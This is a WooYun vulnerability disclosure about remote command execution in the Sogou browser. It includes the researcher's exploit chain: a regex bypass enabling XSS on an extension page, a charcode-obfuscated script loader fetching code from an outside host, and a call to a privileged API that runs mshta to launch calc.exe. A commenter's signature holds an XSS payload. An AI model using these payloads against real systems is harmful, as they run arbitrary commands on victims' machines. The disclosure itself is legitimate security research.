当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-084110

漏洞标题:治标不治本:搜狗浏览器继续远程执行任意命令

相关厂商:搜狗

漏洞作者: gainover

提交时间:2014-11-21 14:06

修复时间:2015-02-19 14:08

公开时间:2015-02-19 14:08

漏洞类型:远程代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-21: 细节已通知厂商并且等待厂商处理中
2014-11-24: 厂商已经确认,细节仅向厂商公开
2014-11-27: 细节向第三方安全合作伙伴开放
2015-01-18: 细节向核心白帽子及相关领域专家公开
2015-01-28: 细节向普通白帽子公开
2015-02-07: 细节向实习白帽子公开
2015-02-19: 细节向公众公开

简要描述:

20分都不给我,好坏好坏好坏的。
先修复,再确认,修复发布浏览器更新了,但又修不好,哪来的自信给我5分。
修复方案:
请修复“厂商回复”中每次都自动回复“感谢支持,欢迎您在SGSRC平台提交漏洞”的漏洞。

详细说明:

1. 更新到最新版本

1.jpg


2. 搜狗针对上一个漏洞,做了一些修复,最根本的协议跳转限制依然没修复。
A. 针对signin.html的XSS做了如下图所示修复:

2.jpg


正则看似写的一大串,很复杂,实则: 连限定开始的 ^ 都落掉了,
直接 javascript:alert(1);//http://www.baidu.com/ 就绕过正则了
B. 当顶层的URL不是 se-extension:// 时,扩展API的调用会有限制, 但是当前URL为se-extension://时,依然可以调用扩展API。
因此,我们虽然无法用iframe来进行嵌入调用,但是结合
location.href 和 window.open,依然可以执行命令,代码如下:
首先location.href跳转到 signin.html的XSS页面:

location.href='se-extension://ext-1055834318/signin.html?app=test&code=javascript:document.write("<img src%3D1 onerror%3Deval(String.fromCharCode(119,105,110,100,111,119,46,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,119,105,110,100,111,119,46,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,53,56,44,52,55,44,52,55,44,49,50,48,44,49,49,53,44,49,49,53,44,49,49,54,44,52,54,44,49,49,53,44,49,48,53,44,49,49,48,44,57,55,44,57,55,44,49,49,50,44,49,49,50,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,50,44,49,49,49,44,57,57,44,52,55,44,49,49,53,44,49,49,49,44,49,48,51,44,49,49,49,44,49,49,55,44,52,54,44,49,48,54,44,49,49,53,41,43,34,63,34,43,77,97,116,104,46,114,97,110,100,111,109,40,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,119,105,110,100,111,119,46,115,41))>");//http://www.baidu.com/';


执行XSS后,调用sogou.js, sogou.js代码如下:

window.w=parent.window.open("se-extension://ext740107210/html/back.html");
function load(){
if(window.w&&window.w.document.getElementById("embed1")){
clearTimeout(window.xx);
window.w.document.getElementById("embed1").startExe("mshta javascript:(new/**/ActiveXObject('WScript.Shell').run('calc.exe'));window.moveTo(-1000,-1000);window.close();",function(){console.log(arguments)});
}
};
window.xx=setInterval(function(){load();},100);


利用window.open打开se-extension://ext740107210/html/back.html,然后通过返回的窗口对象,调用document.getElementById("embed1").startExe,即可执行任意命令。
具体效果见漏洞证明

漏洞证明:

访问: http://xsst.sinaapp.com/poc/sogouxxx.html

3.jpg

修复方案:

请修复“厂商回复”中每次都自动回复“感谢支持,欢迎您在SGSRC平台提交漏洞”的BUG。

版权声明:转载请注明来源 gainover@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-11-24 18:48

厂商回复:

您好,感谢支持,我们会尽快修复

最新状态:

暂无


漏洞评价:

评论

  1. 2014-11-21 14:09 | YY-2012 ( 普通白帽子 | Rank:2763 漏洞数:641 | 意淫,是《红楼梦》原创的词汇,但后来演变...)

    低:1分------谢谢关注。滚

  2. 2014-11-21 14:10 | 小小黑 ( 路人 | Rank:18 漏洞数:3 | ...)

    打脸呢这是?

  3. 2014-11-21 14:11 | chopper ( 普通白帽子 | Rank:144 漏洞数:29 | 菜鸟求学,多多关照~)

    厂商见到你就怕了,又要加班了。

  4. 2014-11-21 14:12 | 紫衣大侠 ( 普通白帽子 | Rank:201 漏洞数:21 | 愿结天下有识之士)

    啪啪啪~~

  5. 2014-11-21 14:14 | ghy459 ( 实习白帽子 | Rank:62 漏洞数:5 | 深挖洞,广积shell。)

    搜狗要把二哥列入黑名单了哈哈哈

  6. 2014-11-21 14:21 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    二哥浏览器专场

  7. 2014-11-21 14:22 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    我抢劫你什么,我是抢劫的人吗?臭不要脸还在笑,发生关系还在笑。大老远的把我骗过来,把我玩了,20分都不给我,没见过这么恶心的人

  8. 2014-11-21 14:31 | 大亮 ( 普通白帽子 | Rank:306 漏洞数:65 | 慢慢挖洞)

    二哥很生气,后果很严重啊

  9. 2014-11-21 14:47 | mramydnei ( 普通白帽子 | Rank:348 漏洞数:80 )

    一发不可收拾啊 我赌还是5分

  10. 2014-11-21 15:00 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    二哥说了 不给20整死

  11. 2014-11-21 15:03 | adm1n ( 普通白帽子 | Rank:216 漏洞数:66 | 只是一个渣渣而已。。。)

    20分都不给我,好坏好坏好坏的

  12. 2014-11-21 15:18 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:19 | 么么哒,呵呵哒,么蛤蛤~)

    二哥说了,要么20要加班加死你们

  13. 2014-11-21 15:19 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    哈哈哈 2哥 20哥

  14. 2014-11-21 15:19 | 小威 ( 普通白帽子 | Rank:492 漏洞数:76 | 活到老,学到老!)

    我不认识你,所以给你5分!

  15. 2014-11-21 15:21 | 铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)

    我来看看给几分

  16. 2014-11-21 15:35 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    修补后,忽略。谢谢关注,未能成功复现。

  17. 2014-11-21 16:02 | 小熊饼干 ( 实习白帽子 | Rank:41 漏洞数:6 | 酱油专业户)

    哈哈,最爱二哥的漏洞,“整天就知道“欢迎来SGSRC平台提交漏洞” 哈哈 这是拿漏洞冲指标呢

  18. 2014-11-21 16:12 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    期待厂商的回复啊

  19. 2014-11-21 17:22 | 伟大娃娃 ( 普通白帽子 | Rank:130 漏洞数:10 | 改变世界)

    你骗我,你说在家写毕业PPT的~

  20. 2014-11-21 17:25 | Mody ( 普通白帽子 | Rank:110 漏洞数:27 | "><img src=x onerror=alert(1);> <img s...)

    打脸成功,啪啪

  21. 2014-11-21 17:29 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    你骗我,你说在家写毕业PPT的~

  22. 2014-11-21 20:39 | 心伤的瘦子 ( 普通白帽子 | Rank:147 漏洞数:21 | 严肃点~此号为虚拟小号,并不存在实体...)

    @only_guest @伟大娃娃 写毕业PPT是吃零食,找漏洞是生活 ---华丽的小尾巴---我不是二哥---

  23. 2014-11-21 21:26 | 炯炯虾 ( 路人 | Rank:2 漏洞数:1 | 我来自地球)

    就是给你五分 咋滴

  24. 2014-11-23 01:04 | LaiX ( 普通白帽子 | Rank:128 漏洞数:39 | 承接 建站、仿站、维护、反黑客、代码审计...)

    二哥,这一发不可收拾

  25. 2014-11-24 19:07 | Woodee ( 路人 | 还没有发布任何漏洞 | 乌云路人甲,打脸pa pa pa)

    2哥,他们家的回复终于改了。

  26. 2014-11-24 19:20 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    8分好啊 8分吉利

  27. 2014-11-24 19:55 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @xsser =。= 还是拿小号发搜狗的好了,简直是拉低我rank平均值。

  28. 2014-11-24 20:36 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @gainover 8分。。。搜狗这档次要求是有多高啊!拉低rank平均值,人人网今天给了我2个1rank,妹的。。

  29. 2014-11-24 21:05 | p.z 认证白帽子 ( 普通白帽子 | Rank:411 漏洞数:40 )

    我觉得应该是这样 5 8 10 11 11 10 8 5

  30. 2014-11-24 21:24 | F0rm ( 路人 | Rank:0 漏洞数:2 | )

    8——发

  31. 2014-11-24 22:39 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @p.z 我觉得应该是5 8 6 1 1

  32. 2014-11-28 17:06 | noob ( 实习白帽子 | Rank:81 漏洞数:18 | 向各位大神学习,向各位大神致敬)

    @魇 100块,拿去

  33. 2014-12-02 17:10 | darkrerror ( 普通白帽子 | Rank:263 漏洞数:44 )

    @魇 小伙很摩登啊

  34. 2014-12-15 09:13 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    请修复“厂商回复”中每次都自动回复“感谢支持,欢迎您在SGSRC平台提交漏洞”的BUG。您好,感谢支持,我们会尽快修复

  35. 2015-02-19 17:50 | 感染者 ( 路人 | Rank:19 漏洞数:16 | 喜欢探索,愿与君共勉!)

    8有点低了啊……

  36. 2015-02-19 18:27 | 静默 ( 路人 | Rank:8 漏洞数:6 | 安全小白)

    好坑爹的厂商啊,命令执行才给8